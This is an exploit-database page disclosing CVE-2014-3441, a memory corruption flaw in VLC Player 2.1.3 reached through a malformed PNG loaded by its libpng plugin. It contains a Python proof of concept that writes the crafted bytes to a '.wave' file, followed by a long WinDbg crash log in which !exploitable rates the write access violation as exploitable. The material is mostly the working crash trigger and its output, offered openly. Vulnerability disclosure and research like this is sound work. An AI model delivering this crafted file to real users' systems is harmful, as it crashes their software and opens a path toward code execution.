VLC Player 2.1.3 Memory Corruption



EKU-ID: 4026 CVE: 2014-3441 OSVDB-ID:
Author: Aryan Bayaninejad Published: 2014-05-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ]
# Date: [2014/05/07]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.videolan.org]
# Software Link: [
http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/
]
# Version: [Version 2.1.3 and prior to that]
# Tested on: [Windows Xp Sp 3 x86]
# CVE : [2014-3441]

details:

VLCplayer latest version V 2.1.3 suffers from an  memory corruption
Vulnerability via  a malformed .png file format when load
codec\libpng_plugin.dll, you can change file extention to .wave


Poc:

#!/usr/bin/python
data =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
outfile = file("poc.wave", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"





windbg result:


Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00426000   image00400000
ModLoad: 7c900000 7c9af000   ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 6a300000 6a324000   C:\Program Files\VideoLAN\VLC\libvlc.dll
ModLoad: 6a540000 6a791000   C:\Program Files\VideoLAN\VLC\libvlccore.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.DLL
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76bf0000 76bfb000   C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 771b0000 7725a000   C:\WINDOWS\system32\WININET.DLL
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 774e0000 7761d000   C:\WINDOWS\system32\ole32.dll
(250.c1c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
ntdll.dll -
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48
edi=00351eb4
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:000> g
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 773d0000 774d3000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 10000000 10008000   C:\Program Files\Internet Download
Manager\idmmkb.dll
ModLoad: 64fc0000 65008000   C:\Program
Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
ModLoad: 6aac0000 6aacf000   C:\Program
Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
ModLoad: 6e980000 6e990000   C:\Program
Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
ModLoad: 6a100000 6a119000   C:\Program
Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
ModLoad: 6c400000 6c5f6000   C:\Program
Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
ModLoad: 68740000 68760000   C:\Program
Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
ModLoad: 6f440000 6f483000   C:\Program
Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
ModLoad: 6b840000 6b85b000   C:\Program
Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
ModLoad: 6f100000 6f114000   C:\Program
Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
ModLoad: 68bc0000 68bd7000   C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
ModLoad: 64a00000 64a8b000   C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
ModLoad: 70680000 70736000   C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
ModLoad: 6ae40000 6ae64000   C:\Program
Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
ModLoad: 69e40000 69e52000   C:\Program
Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
ModLoad: 6d700000 6d70c000   C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
ModLoad: 70240000 70267000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
ModLoad: 6cd00000 6ce7a000   C:\Program
Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
ModLoad: 66040000 66090000   C:\Program
Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
ModLoad: 625c0000 626f9000   C:\Program
Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
ModLoad: 73f10000 73f6c000   C:\WINDOWS\system32\DSOUND.DLL
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\setupapi.dll
ModLoad: 6ff40000 6ff55000   C:\Program
Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
ModLoad: 6e180000 6e191000   C:\Program
Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc
without interface.
ModLoad: 68e80000 6992e000   C:\Program
Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.DLL
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.DLL
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\userenv.dll
ModLoad: 01a20000 01ce5000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\comctl32.dll
ModLoad: 76360000 76370000   C:\WINDOWS\system32\winsta.dll
ModLoad: 5b860000 5b8b5000   C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 6d6c0000 6d6f7000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 6e040000 6e05e000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 68440000 68458000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 6c380000 6c39b000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
ModLoad: 6ef40000 6ef4e000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
es demux error: cannot peek
es demux error: cannot peek
ModLoad: 011e0000 011fa000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
ModLoad: 6c2c0000 6c2cd000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
ModLoad: 62380000 6238e000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
ModLoad: 67e00000 67e0d000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
ModLoad: 03610000 036fc000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
ModLoad: 6bf40000 6bf65000   C:\Program
Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
ModLoad: 6f8c0000 6f8eb000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
ModLoad: 6a840000 6a96f000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
ModLoad: 70b00000 70b0c000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
ModLoad: 6d8c0000 6d97b000   C:\Program
Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll
ModLoad: 64740000 6474d000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
ModLoad: 6cbc0000 6cbcd000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
ModLoad: 65300000 6530c000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
ModLoad: 67500000 6750d000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
ModLoad: 6ce80000 6ce8d000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
ModLoad: 6fec0000 6fecc000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
ModLoad: 6b500000 6b56d000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
ModLoad: 65280000 6528d000   C:\Program
Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
ModLoad: 6c940000 6c94e000   C:\Program
Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
ModLoad: 683c0000 6840f000   C:\Program
Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
(250.b14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\msvcrt.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80
edi=018e5000
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0         nv up ei pl nz na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010206
msvcrt!memset+0x41:
77c47631 f3ab            rep stos dword ptr es:[edi]
0:009> .load winext/msec.dll
0:009> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\libvlccore.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll -
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)

User mode write access violations that are not near NULL are exploitable.